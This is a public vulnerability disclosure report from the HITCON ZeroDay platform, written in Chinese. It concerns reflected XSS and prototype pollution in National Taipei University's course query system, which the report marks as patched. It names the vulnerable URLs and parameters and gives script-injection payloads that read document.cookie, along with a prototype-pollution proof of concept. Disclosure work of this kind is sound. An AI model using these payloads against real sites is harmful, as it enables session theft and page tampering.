Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2021-00897
- Vendor: 國立臺北大學
- Title: 國立台北大學-課程查詢系統 網址參數存在 XSS 與 原型污染
- Introduction: 網址參數存在 XSS 與 原型污染
處理狀態
目前狀態
公開
Last Update : 2021/12/29
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2021/12/09 11:19:43 : 新提交 (由 BTtea 更新此狀態)
- 2021/12/09 11:44:02 : 新提交 (由 BTtea 更新此狀態)
- 2021/12/09 11:44:54 : 新提交 (由 BTtea 更新此狀態)
- 2021/12/10 23:55:01 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/12/15 12:20:49 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/12/15 12:20:49 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/12/15 12:20:49 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/12/21 12:47:29 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/12/29 03:00:08 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2021-00897
- 通報者:blacktea_player (BTtea)
- 風險:低
- 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)
參考資料
攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://sea.cc.ntpu.edu.tw/pls/dev_stud/course_query.queryGuide?g_serial=U2177&g_year=110&g_term=1&show_info=part
https://sea.cc.ntpu.edu.tw/pls/dev_stud/course_query_all.query_frame?flag=6
https://sea.cc.ntpu.edu.tw/pls/dev_stud/course_query_all.query_frame?flag=6
敘述
https://sea.cc.ntpu.edu.tw/pls/dev_stud/course_query.queryGuide?g_serial=U2177&g_year=110&g_term=1&show_info=part
g_serial , gyear 值存在 XSS
xss payload : "><script>alert(document.cookie)</script>
xss 原型污染 PoC payload : "><script>$.extend(true,{},JSON.parse('{"__proto_\":{"z":123}}'));alert(z);</script>
https://sea.cc.ntpu.edu.tw/pls/dev_stud/course_query_all.query_frame?flag=6
在這個頁面送出的資料連結網址
https://sea.cc.ntpu.edu.tw/pls/dev_stud/course_query_all.queryByKeyword
之下的 POST 參數 courseno , cour , teach , week , seq1 , seq2 存在 XSS
xss payload : "><script>alert(document.cookie)</script>
xss 原型污染 PoC payload : "><script>$.extend(true,{},JSON.parse('{"__proto__":{"z":123}}'));alert(z);</script>
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。